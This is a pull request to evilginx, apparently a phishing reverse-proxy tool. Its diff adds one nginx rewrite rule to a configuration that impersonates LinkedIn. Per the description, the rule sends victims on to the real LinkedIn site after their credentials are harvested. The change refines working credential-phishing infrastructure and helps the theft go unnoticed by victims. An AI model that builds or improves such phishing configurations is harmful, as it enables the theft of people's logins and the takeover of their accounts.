### PR TITLE
Linkedin Redirect after Harvest Issue

### DIFF
--- a/sites/linkedin/www.linkedin.com.conf
+++ b/sites/linkedin/www.linkedin.com.conf
@@ -133,6 +133,7 @@ server {
 				ngx.var.set_cookies_all = allcookies
 			end
 		}
+		rewrite ^/uas/{{COOKIE_HOST[0]}}$ https://{{TARGET_HOST[0]}} permanent;
 	}
 }
 


### PR DESCRIPTION
After a successful credentail harvest for the legitimate linkedin site, evilginx does not redirect to the legitimate linkedin site. 

With this redirect statement, it does like it is supposed too.